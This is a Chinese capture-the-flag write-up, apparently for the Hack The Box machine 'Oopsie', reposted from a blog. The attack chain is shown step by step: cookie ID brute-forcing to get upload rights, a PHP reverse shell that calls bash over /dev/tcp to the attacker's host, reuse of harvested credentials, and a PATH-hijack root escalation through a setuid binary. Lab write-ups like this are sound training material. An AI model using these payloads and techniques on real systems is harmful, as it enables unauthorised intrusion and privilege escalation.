文章目錄
- 前言
- 解題
- 資訊搜集
- 訪問apache80
- 反彈shell
- 切換到tty
- User Owns Flag
- 查看www原始碼
- 切換用戶
- System Owns Flag
- 完
前言
操作基于Kali 2020,參照官方wp
解題
資訊搜集
nmap掃描
nmap -sS -A 10.10.10.28
掃出一個ssh和apache
訪問apache80
瀏覽器訪問一下80康康
F12審查元素和Network
發現有一個cdn-cgi/login/,應該是一個登錄界面
上一道題知道了管理員密碼是MEGACORP_4dm1n!!,試試登錄
(這步是看了wp才知道的,與上一題聯系)
進去以后,很顯眼就是upload
提示要superadmin才能上傳
還有一個值得注意,account用戶串列
進去康康,發現了id,似乎可窮舉爆一下
bp也可以發現,這個AccessID就是cookie識別身份的
爆出來AccessID是86575
改一下cookie,直接訪問upload
反彈shell
傳個php反彈shell,ip是Kali的,埠自定義
<?php
exec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.xx/xxxx 0<&1 '");
?>
用dirsearch掃一下上傳到的目錄
python3 dirsearch.py -u http://10.10.10.28 -e *
起一個監聽
nc -lvnp 4444
瀏覽器訪問uploads/1.php,nc可以執行命令
切換到tty
切到tty才能獲得一個互動式的shell
SHELL=/bin/bash script -q /dev/null
如果不切換的話,例如輸入密碼是無法執行的
User Owns Flag
flag在用戶檔案夾內
查看www原始碼
找到一個資料庫連接檔案
cat讀取
切換用戶
在找用戶flag的時候已經發現了同名的賬戶,這個應該是密碼,切換一下用戶
su robert
M3g4C0rpUs3r!
id查看一下用戶組資訊
發現一個奇怪的用戶組,窮舉找該組的特權命令,把permission denied的報錯丟了
find / -type f -group bugtracker 2>/dev/null
用strings看一下這個二進制檔案的內容
strings /usr/bin/bugtracker
這個程式運行的時候呼叫了root的cat,如果把cat的路徑修改成運行bash,就能夠獲得root shell了
tmp檔案夾一般有所有的權限,在下面新建一個cat,并指向bash
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat
export PATH=/tmp:$PATH
接下來運行這個bugtracker就會進入root shell了
/usr/bin/bugtracker
System Owns Flag
flag在root用戶檔案夾內
cat /root/root.txt
完
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/290005.html
標籤:其他
上一篇:自動化網路安全防御的問題